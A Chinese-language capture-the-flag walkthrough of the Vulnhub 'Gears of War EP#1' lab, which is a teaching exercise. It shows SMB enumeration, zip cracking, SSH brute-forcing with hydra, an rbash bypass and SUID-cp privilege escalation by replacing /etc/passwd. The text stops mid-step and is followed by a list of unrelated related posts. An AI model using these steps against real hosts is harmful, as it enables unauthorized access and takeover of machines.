Vulnhub靶机:GEARS OF WAR_ EP#1
目录
- 介绍
- 信息收集
- 主机发现
- 主机信息探测
- 访问网站
- 测试 samba 安全
- smbmap 访问默认共享
- enum4linux 获取系统用户
- smbclient获取文件
- 查看文件
- SSH爆破
- 登录SSH
- 绕过rbash
- 提权
- 查看flag
- 参考
介绍
系列:Gears of War(此系列仅此一台)
发布日期: 2019年10月17日
难度: 初级
Flag : 不详
学习:SMB攻击
靶机地址:https://www.vulnhub.com/entry/gears-of-war-ep1,382/
涉及到的相关工具,参见之前的文章:HACKNOS: OS-BYTESEC
信息收集
主机发现
netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
主机信息探测
信息探测:nmap -A -p- 192.168.124.10
,开放了22、80、139、445端口,445的信息过多,靶机的重点是在445上。
访问网站
会注意到网站上面有一个按钮,点击之后依然是一个静态页面,没啥玩的。
测试 samba 安全
smbmap 访问默认共享
smbmap -H 192.168.124.10
,发现LOCUS_LAN$
有读取权限
递归读取LOCUS_LAN$
文件夹:smbmap -H 192.168.124.10 -R LOCUS_LAN$
enum4linux 获取系统用户
使用命令:enum4linux 192.168.124.10 -R | grep Local
枚举出三个用户:marcus、root、nobody
smbclient获取文件
使用空密码连接靶机的共享文件夹,使用get命令下载文件
查看文件
压缩包需要密码才能打开,txt给了一些提示,猜测是@%%,
的某一种排列组合才能打开数据包
- 生成字典:
crunch 4 4 -t @%%, > list.txt
- 爆破压缩包
- 安装工具:
sudo apt-get install fcrackzip
- 爆破:
fcrackzip -D -u -p list.txt msg_horda.zip
- 安装工具:
翻译一下,给了我们一些字符:3_d4y。大概率就是这个靶机上的某用户的名字或者密码,由于压缩包解压之后得到的是key.txt,猜测这个应该是密码。
SSH爆破
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.124.10
登录SSH
使用命令:ssh marcus@192.168.124.10
发现自己的家目录里面有个文件夹,但是访问它的时候被拒了,提示rbash是受限制的。
绕过rbash
指定终端:ssh marcus@192.168.124.10 -t "bash -noprofile"
进来之后,发现啥也没有
提权
家目录下没啥文件,直接提权吧。
- 查找SUID文件:
find / -type f -perm -u=s 2>/dev/null
发现了cp
,剩下的简单了,替换passwd文件实现提权即可
- 提取出靶机的passwd文件:
cat /etc/passwd > passwd
- kali通过OpenSSL passwd生成一个新的用户hacker,密码为hack123:
┌──(root
Vulnhub靶机:GEARS OF WAR_ EP#1相关推荐
- Vulnhub靶机:HACKER KID_ 1.0.1
目录 介绍 信息收集 主机发现 主机信息探测 53 端口 网站探测 页面源代码 DIG信息收集 经典XXE漏洞 探测9999端口 SSTI模板注入 Capabilities 提权 发现具有Capabi ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- Vulnhub靶机:EVILBOX_ ONE(很详细)
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...
- Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
最新文章
- PC和手机怎么实现绝对居中?
- Mock session,cookie,querystring in ASB.NET MVC
- 苹果Mac操作系统下怎么显示隐藏文件
- c语言 static 关键字的作用
- 一键拼出你的微信好友图片墙!
- python比较列表所有项是否有相同的部分_检查列表中的所有元素是否相同
- 马云语录,非常值得一看(转)
- 1031. 查验身份证(15)
- oracle之数据处理之视图
- rman 脚本备份全过程
- 决策树(十)--GBDT及OpenCV源码分析
- 基于深度学习的问答系统论文
- Java面试题!mysql安装教程图解
- Vulnhub靶场之symfonos:1
- matlab 元胞自动机
- Echarts通用饼图、柱状图、折线图封装
- 机器视觉 零基础Python+OpenCV+MediaPipe手势识别教程(一)手势识别基础入门
- 北京博奥智源,浅谈术语管理服务器软件开发所需功能设计
- 微信公众号 服务器自动回复,微信订阅后台自动回复功能的实现
- iOS开发,导入c文件引发的 Unknown type name 'NSString' 问题
热门文章
- [基础数论]CRT中国剩余定理(模数互质与不互质)
- Android: Camera2相机开发 知识储备
- 修改video标签默认样式问题video播放器样式优化;video播放器默认显示图片
- 学生如何掌握学习诀窍?这招很实用
- Flask实战!从后台管理到人脸识别,六款优质Flask开源项目介绍
- 实验室信息管理系统源码,LIS系统源码
- 计算机网络局域网之以太网交换机
- numpy 中 sign 函数的用法
- FuzzyDID:模糊倍分法
- 怎么就能打开微信服务器恢复朋友圈信息,今天才知道,原来微信打开这个功能,就能删除几年前的朋友圈内容...